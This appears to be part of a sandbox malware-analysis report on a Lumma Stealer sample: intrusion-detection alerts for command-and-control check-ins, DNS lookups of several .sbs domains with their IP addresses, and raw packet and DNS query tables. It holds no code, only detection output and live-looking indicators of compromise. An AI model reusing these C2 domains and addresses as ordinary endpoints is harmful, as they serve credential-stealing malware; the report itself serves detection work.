2024-10-12T22:36:05.691027+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49715	104.21.33.249	443	TCP
2024-10-12T22:36:05.716570+0200	2056564	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)	1	192.168.2.6	50222	1.1.1.1	53	UDP
2024-10-12T22:36:06.214986+0200	2056565	ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)	1	192.168.2.6	49718	172.67.205.156	443	TCP
2024-10-12T22:36:06.659354+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49718	172.67.205.156	443	TCP
2024-10-12T22:36:06.659354+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49718	172.67.205.156	443	TCP
2024-10-12T22:36:06.687782+0200	2056562	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)	1	192.168.2.6	51843	1.1.1.1	53	UDP
2024-10-12T22:36:07.184611+0200	2056563	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)	1	192.168.2.6	49720	172.67.140.193	443	TCP
2024-10-12T22:36:07.640105+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49720	172.67.140.193	443	TCP
2024-10-12T22:36:07.640105+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49720	172.67.140.193	443	TCP
2024-10-12T22:36:07.803851+0200	2056560	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)	1	192.168.2.6	63149	1.1.1.1	53	UDP
2024-10-12T22:36:08.298990+0200	2056561	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)	1	192.168.2.6	49721	172.67.173.224	443	TCP
2024-10-12T22:36:08.737000+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49721	172.67.173.224	443	TCP
2024-10-12T22:36:08.737000+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49721	172.67.173.224	443	TCP
2024-10-12T22:36:08.748838+0200	2056558	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)	1	192.168.2.6	58354	1.1.1.1	53	UDP
2024-10-12T22:36:09.254568+0200	2056559	ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)	1	192.168.2.6	49732	104.21.79.35	443	TCP
2024-10-12T22:36:09.687676+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49732	104.21.79.35	443	TCP
2024-10-12T22:36:09.687676+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49732	104.21.79.35	443	TCP
2024-10-12T22:36:09.689166+0200	2056556	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)	1	192.168.2.6	50135	1.1.1.1	53	UDP
2024-10-12T22:36:10.181687+0200	2056557	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)	1	192.168.2.6	49738	188.114.96.3	443	TCP
2024-10-12T22:36:10.665845+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49738	188.114.96.3	443	TCP
2024-10-12T22:36:10.665845+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49738	188.114.96.3	443	TCP
2024-10-12T22:36:12.025576+0200	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.6	49744	104.102.49.254	443	TCP
2024-10-12T22:36:12.787291+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49755	172.67.206.204	443	TCP
2024-10-12T22:36:12.787291+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49755	172.67.206.204	443	TCP
2024-10-12T22:36:13.768308+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49761	172.67.206.204	443	TCP
2024-10-12T22:36:13.768308+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49761	172.67.206.204	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 22:36:02.761759043 CEST	49710	443	192.168.2.6	104.21.8.37
Oct 12, 2024 22:36:02.761857033 CEST	443	49710	104.21.8.37	192.168.2.6
Oct 12, 2024 22:36:02.761965036 CEST	49710	443	192.168.2.6	104.21.8.37
Oct 12, 2024 22:36:02.764779091 CEST	49710	443	192.168.2.6	104.21.8.37
Oct 12, 2024 22:36:02.764817953 CEST	443	49710	104.21.8.37	192.168.2.6
Oct 12, 2024 22:36:03.253983974 CEST	443	49710	104.21.8.37	192.168.2.6
Oct 12, 2024 22:36:03.254074097 CEST	49710	443	192.168.2.6	104.21.8.37
Oct 12, 2024 22:36:03.257694006 CEST	49710	443	192.168.2.6	104.21.8.37
Oct 12, 2024 22:36:03.257726908 CEST	443	49710	104.21.8.37	192.168.2.6
Oct 12, 2024 22:36:03.258145094 CEST	443	49710	104.21.8.37	192.168.2.6
Oct 12, 2024 22:36:03.299910069 CEST	49710	443	192.168.2.6	104.21.8.37
Oct 12, 2024 22:36:03.344490051 CEST	49710	443	192.168.2.6	104.21.8.37
Oct 12, 2024 22:36:03.344568014 CEST	49710	443	192.168.2.6	104.21.8.37
Oct 12, 2024 22:36:03.344873905 CEST	443	49710	104.21.8.37	192.168.2.6
Oct 12, 2024 22:36:03.754520893 CEST	443	49710	104.21.8.37	192.168.2.6
Oct 12, 2024 22:36:03.754636049 CEST	443	49710	104.21.8.37	192.168.2.6
Oct 12, 2024 22:36:03.754856110 CEST	49710	443	192.168.2.6	104.21.8.37
Oct 12, 2024 22:36:03.757123947 CEST	49710	443	192.168.2.6	104.21.8.37
Oct 12, 2024 22:36:03.757168055 CEST	443	49710	104.21.8.37	192.168.2.6
Oct 12, 2024 22:36:03.776572943 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:03.776601076 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:03.776684999 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:03.776997089 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:03.777009964 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:04.269290924 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:04.269366980 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:04.272433996 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:04.272439957 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:04.272753000 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:04.273978949 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:04.274008989 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:04.274049997 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:04.696587086 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:04.696839094 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:04.697031021 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:04.697031021 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:04.697056055 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:04.697068930 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:04.778259039 CEST	49715	443	192.168.2.6	104.21.33.249
Oct 12, 2024 22:36:04.778295040 CEST	443	49715	104.21.33.249	192.168.2.6
Oct 12, 2024 22:36:04.778369904 CEST	49715	443	192.168.2.6	104.21.33.249
Oct 12, 2024 22:36:04.778633118 CEST	49715	443	192.168.2.6	104.21.33.249
Oct 12, 2024 22:36:04.778650999 CEST	443	49715	104.21.33.249	192.168.2.6
Oct 12, 2024 22:36:05.271425962 CEST	443	49715	104.21.33.249	192.168.2.6
Oct 12, 2024 22:36:05.271502018 CEST	49715	443	192.168.2.6	104.21.33.249
Oct 12, 2024 22:36:05.273128986 CEST	49715	443	192.168.2.6	104.21.33.249
Oct 12, 2024 22:36:05.273142099 CEST	443	49715	104.21.33.249	192.168.2.6
Oct 12, 2024 22:36:05.273665905 CEST	443	49715	104.21.33.249	192.168.2.6
Oct 12, 2024 22:36:05.274866104 CEST	49715	443	192.168.2.6	104.21.33.249
Oct 12, 2024 22:36:05.274893045 CEST	49715	443	192.168.2.6	104.21.33.249
Oct 12, 2024 22:36:05.274957895 CEST	443	49715	104.21.33.249	192.168.2.6
Oct 12, 2024 22:36:05.691011906 CEST	443	49715	104.21.33.249	192.168.2.6
Oct 12, 2024 22:36:05.691126108 CEST	443	49715	104.21.33.249	192.168.2.6
Oct 12, 2024 22:36:05.691174030 CEST	49715	443	192.168.2.6	104.21.33.249
Oct 12, 2024 22:36:05.691297054 CEST	49715	443	192.168.2.6	104.21.33.249
Oct 12, 2024 22:36:05.691313028 CEST	443	49715	104.21.33.249	192.168.2.6
Oct 12, 2024 22:36:05.691328049 CEST	49715	443	192.168.2.6	104.21.33.249
Oct 12, 2024 22:36:05.691334009 CEST	443	49715	104.21.33.249	192.168.2.6
Oct 12, 2024 22:36:05.735729933 CEST	49718	443	192.168.2.6	172.67.205.156
Oct 12, 2024 22:36:05.735826015 CEST	443	49718	172.67.205.156	192.168.2.6
Oct 12, 2024 22:36:05.735908985 CEST	49718	443	192.168.2.6	172.67.205.156
Oct 12, 2024 22:36:05.736316919 CEST	49718	443	192.168.2.6	172.67.205.156
Oct 12, 2024 22:36:05.736354113 CEST	443	49718	172.67.205.156	192.168.2.6
Oct 12, 2024 22:36:06.214900017 CEST	443	49718	172.67.205.156	192.168.2.6
Oct 12, 2024 22:36:06.214986086 CEST	49718	443	192.168.2.6	172.67.205.156
Oct 12, 2024 22:36:06.216758966 CEST	49718	443	192.168.2.6	172.67.205.156
Oct 12, 2024 22:36:06.216770887 CEST	443	49718	172.67.205.156	192.168.2.6
Oct 12, 2024 22:36:06.217180967 CEST	443	49718	172.67.205.156	192.168.2.6
Oct 12, 2024 22:36:06.218465090 CEST	49718	443	192.168.2.6	172.67.205.156
Oct 12, 2024 22:36:06.218496084 CEST	49718	443	192.168.2.6	172.67.205.156
Oct 12, 2024 22:36:06.218559027 CEST	443	49718	172.67.205.156	192.168.2.6
Oct 12, 2024 22:36:06.659476042 CEST	443	49718	172.67.205.156	192.168.2.6
Oct 12, 2024 22:36:06.659725904 CEST	443	49718	172.67.205.156	192.168.2.6
Oct 12, 2024 22:36:06.659801960 CEST	49718	443	192.168.2.6	172.67.205.156
Oct 12, 2024 22:36:06.660048008 CEST	49718	443	192.168.2.6	172.67.205.156
Oct 12, 2024 22:36:06.660070896 CEST	443	49718	172.67.205.156	192.168.2.6
Oct 12, 2024 22:36:06.660083055 CEST	49718	443	192.168.2.6	172.67.205.156
Oct 12, 2024 22:36:06.660089970 CEST	443	49718	172.67.205.156	192.168.2.6
Oct 12, 2024 22:36:06.703908920 CEST	49720	443	192.168.2.6	172.67.140.193
Oct 12, 2024 22:36:06.703938961 CEST	443	49720	172.67.140.193	192.168.2.6
Oct 12, 2024 22:36:06.704164028 CEST	49720	443	192.168.2.6	172.67.140.193
Oct 12, 2024 22:36:06.704509020 CEST	49720	443	192.168.2.6	172.67.140.193
Oct 12, 2024 22:36:06.704523087 CEST	443	49720	172.67.140.193	192.168.2.6
Oct 12, 2024 22:36:07.184547901 CEST	443	49720	172.67.140.193	192.168.2.6
Oct 12, 2024 22:36:07.184611082 CEST	49720	443	192.168.2.6	172.67.140.193
Oct 12, 2024 22:36:07.187165022 CEST	49720	443	192.168.2.6	172.67.140.193
Oct 12, 2024 22:36:07.187176943 CEST	443	49720	172.67.140.193	192.168.2.6
Oct 12, 2024 22:36:07.187699080 CEST	443	49720	172.67.140.193	192.168.2.6
Oct 12, 2024 22:36:07.197987080 CEST	49720	443	192.168.2.6	172.67.140.193
Oct 12, 2024 22:36:07.198009014 CEST	49720	443	192.168.2.6	172.67.140.193
Oct 12, 2024 22:36:07.198148012 CEST	443	49720	172.67.140.193	192.168.2.6
Oct 12, 2024 22:36:07.640028000 CEST	443	49720	172.67.140.193	192.168.2.6
Oct 12, 2024 22:36:07.640280008 CEST	443	49720	172.67.140.193	192.168.2.6
Oct 12, 2024 22:36:07.640340090 CEST	49720	443	192.168.2.6	172.67.140.193
Oct 12, 2024 22:36:07.800942898 CEST	49720	443	192.168.2.6	172.67.140.193
Oct 12, 2024 22:36:07.800971985 CEST	443	49720	172.67.140.193	192.168.2.6
Oct 12, 2024 22:36:07.800986052 CEST	49720	443	192.168.2.6	172.67.140.193
Oct 12, 2024 22:36:07.800993919 CEST	443	49720	172.67.140.193	192.168.2.6
Oct 12, 2024 22:36:07.821952105 CEST	49721	443	192.168.2.6	172.67.173.224
Oct 12, 2024 22:36:07.821986914 CEST	443	49721	172.67.173.224	192.168.2.6
Oct 12, 2024 22:36:07.822050095 CEST	49721	443	192.168.2.6	172.67.173.224
Oct 12, 2024 22:36:07.822560072 CEST	49721	443	192.168.2.6	172.67.173.224
Oct 12, 2024 22:36:07.822685003 CEST	443	49721	172.67.173.224	192.168.2.6
Oct 12, 2024 22:36:08.298876047 CEST	443	49721	172.67.173.224	192.168.2.6
Oct 12, 2024 22:36:08.298990011 CEST	49721	443	192.168.2.6	172.67.173.224
Oct 12, 2024 22:36:08.300647974 CEST	49721	443	192.168.2.6	172.67.173.224
Oct 12, 2024 22:36:08.300663948 CEST	443	49721	172.67.173.224	192.168.2.6
Oct 12, 2024 22:36:08.301018953 CEST	443	49721	172.67.173.224	192.168.2.6
Oct 12, 2024 22:36:08.307130098 CEST	49721	443	192.168.2.6	172.67.173.224
Oct 12, 2024 22:36:08.307172060 CEST	49721	443	192.168.2.6	172.67.173.224
Oct 12, 2024 22:36:08.307266951 CEST	443	49721	172.67.173.224	192.168.2.6
Oct 12, 2024 22:36:08.737035990 CEST	443	49721	172.67.173.224	192.168.2.6
Oct 12, 2024 22:36:08.737282038 CEST	443	49721	172.67.173.224	192.168.2.6
Oct 12, 2024 22:36:08.737427950 CEST	49721	443	192.168.2.6	172.67.173.224
Oct 12, 2024 22:36:08.737529039 CEST	49721	443	192.168.2.6	172.67.173.224
Oct 12, 2024 22:36:08.737552881 CEST	443	49721	172.67.173.224	192.168.2.6
Oct 12, 2024 22:36:08.737606049 CEST	49721	443	192.168.2.6	172.67.173.224
Oct 12, 2024 22:36:08.737612963 CEST	443	49721	172.67.173.224	192.168.2.6
Oct 12, 2024 22:36:08.766403913 CEST	49732	443	192.168.2.6	104.21.79.35
Oct 12, 2024 22:36:08.766426086 CEST	443	49732	104.21.79.35	192.168.2.6
Oct 12, 2024 22:36:08.766505003 CEST	49732	443	192.168.2.6	104.21.79.35
Oct 12, 2024 22:36:08.766829967 CEST	49732	443	192.168.2.6	104.21.79.35
Oct 12, 2024 22:36:08.766844988 CEST	443	49732	104.21.79.35	192.168.2.6
Oct 12, 2024 22:36:09.254462004 CEST	443	49732	104.21.79.35	192.168.2.6
Oct 12, 2024 22:36:09.254568100 CEST	49732	443	192.168.2.6	104.21.79.35
Oct 12, 2024 22:36:09.256444931 CEST	49732	443	192.168.2.6	104.21.79.35
Oct 12, 2024 22:36:09.256453991 CEST	443	49732	104.21.79.35	192.168.2.6
Oct 12, 2024 22:36:09.256855965 CEST	443	49732	104.21.79.35	192.168.2.6
Oct 12, 2024 22:36:09.258012056 CEST	49732	443	192.168.2.6	104.21.79.35
Oct 12, 2024 22:36:09.258032084 CEST	49732	443	192.168.2.6	104.21.79.35
Oct 12, 2024 22:36:09.258096933 CEST	443	49732	104.21.79.35	192.168.2.6
Oct 12, 2024 22:36:09.687655926 CEST	443	49732	104.21.79.35	192.168.2.6
Oct 12, 2024 22:36:09.687818050 CEST	443	49732	104.21.79.35	192.168.2.6
Oct 12, 2024 22:36:09.687877893 CEST	49732	443	192.168.2.6	104.21.79.35
Oct 12, 2024 22:36:09.688024044 CEST	49732	443	192.168.2.6	104.21.79.35
Oct 12, 2024 22:36:09.688040018 CEST	443	49732	104.21.79.35	192.168.2.6
Oct 12, 2024 22:36:09.688050032 CEST	49732	443	192.168.2.6	104.21.79.35
Oct 12, 2024 22:36:09.688055038 CEST	443	49732	104.21.79.35	192.168.2.6
Oct 12, 2024 22:36:09.700063944 CEST	49738	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:09.700114965 CEST	443	49738	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:09.700221062 CEST	49738	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:09.700529099 CEST	49738	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:09.700547934 CEST	443	49738	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:10.181606054 CEST	443	49738	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:10.181687117 CEST	49738	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:10.231357098 CEST	49738	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:10.231376886 CEST	443	49738	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:10.232609987 CEST	443	49738	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:10.245861053 CEST	49738	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:10.245882034 CEST	49738	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:10.245954037 CEST	443	49738	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:10.665915012 CEST	443	49738	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:10.666182995 CEST	443	49738	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:10.666260004 CEST	49738	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:10.666312933 CEST	49738	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:10.666337967 CEST	443	49738	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:10.666352034 CEST	49738	443	192.168.2.6	188.114.96.3
Oct 12, 2024 22:36:10.666359901 CEST	443	49738	188.114.96.3	192.168.2.6
Oct 12, 2024 22:36:10.675149918 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:10.675182104 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:10.675246000 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:10.675540924 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:10.675558090 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:11.390243053 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:11.390521049 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:11.392092943 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:11.392100096 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:11.392422915 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:11.393670082 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:11.435406923 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.025593996 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.025626898 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.025649071 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.025701046 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.025717020 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.025754929 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.025785923 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.156086922 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.156115055 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.156157017 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.156167984 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.156186104 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.156213999 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.163093090 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.163155079 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.163271904 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.163322926 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.163326979 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.163361073 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.163361073 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.163387060 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.163393021 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.163400888 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.163409948 CEST	49744	443	192.168.2.6	104.102.49.254
Oct 12, 2024 22:36:12.163414001 CEST	443	49744	104.102.49.254	192.168.2.6
Oct 12, 2024 22:36:12.176151037 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.176189899 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.176276922 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.176600933 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.176620007 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.661891937 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.661978960 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.663312912 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.663331985 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.663770914 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.664815903 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.664843082 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.664901972 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.787341118 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.787478924 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.787539959 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.787636995 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.787662983 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.787893057 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.792252064 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.792443991 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.792505980 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.792562962 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.792578936 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.792594910 CEST	49755	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.792599916 CEST	443	49755	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.838994980 CEST	49761	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.839051962 CEST	443	49761	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:12.839131117 CEST	49761	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.839459896 CEST	49761	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:12.839478970 CEST	443	49761	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:13.334232092 CEST	443	49761	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:13.334311962 CEST	49761	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:13.335289955 CEST	49761	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:13.335304022 CEST	443	49761	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:13.335514069 CEST	443	49761	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:13.337016106 CEST	49761	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:13.337054968 CEST	49761	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:13.337073088 CEST	443	49761	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:13.768270016 CEST	443	49761	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:13.768371105 CEST	443	49761	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:13.768505096 CEST	49761	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:13.770653963 CEST	49761	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:13.770678997 CEST	443	49761	172.67.206.204	192.168.2.6
Oct 12, 2024 22:36:13.770716906 CEST	49761	443	192.168.2.6	172.67.206.204
Oct 12, 2024 22:36:13.770725012 CEST	443	49761	172.67.206.204	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 22:36:02.740997076 CEST	55988	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:02.757307053 CEST	53	55988	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:03.762048006 CEST	64493	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:03.775693893 CEST	53	64493	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:04.698407888 CEST	53786	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:04.708112955 CEST	53	53786	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:04.758724928 CEST	50381	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:04.772324085 CEST	53	50381	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:05.716569901 CEST	50222	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:05.735029936 CEST	53	50222	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:06.687782049 CEST	51843	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:06.700640917 CEST	53	51843	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:07.803850889 CEST	63149	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:07.820810080 CEST	53	63149	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:08.748837948 CEST	58354	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:08.765737057 CEST	53	58354	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:09.689166069 CEST	50135	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:09.699343920 CEST	53	50135	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:10.667393923 CEST	64627	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:10.674513102 CEST	53	64627	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:12.166202068 CEST	58774	53	192.168.2.6	1.1.1.1
Oct 12, 2024 22:36:12.175319910 CEST	53	58774	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:19.809146881 CEST	53	60196	1.1.1.1	192.168.2.6
Oct 12, 2024 22:36:21.484205961 CEST	53	53011	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 12, 2024 22:36:02.740997076 CEST	192.168.2.6	1.1.1.1	0x4233	Standard query (0)	widdensmoywi.sbs	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:03.762048006 CEST	192.168.2.6	1.1.1.1	0x5a0	Standard query (0)	mathcucom.sbs	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:04.698407888 CEST	192.168.2.6	1.1.1.1	0xd91f	Standard query (0)	allocatinow.sbs	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:04.758724928 CEST	192.168.2.6	1.1.1.1	0x9c26	Standard query (0)	enlargkiw.sbs	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:05.716569901 CEST	192.168.2.6	1.1.1.1	0x3c8d	Standard query (0)	resinedyw.sbs	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:06.687782049 CEST	192.168.2.6	1.1.1.1	0x86c4	Standard query (0)	vennurviot.sbs	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:07.803850889 CEST	192.168.2.6	1.1.1.1	0xb641	Standard query (0)	ehticsprocw.sbs	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:08.748837948 CEST	192.168.2.6	1.1.1.1	0x4458	Standard query (0)	condifendteu.sbs	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:36:09.689166069 CEST	192.168.2.6	1.1.1.1	0x6ed9	Standard query (0)	drawwyobstacw.sbs	A (IP address)	IN (0x0001)	false
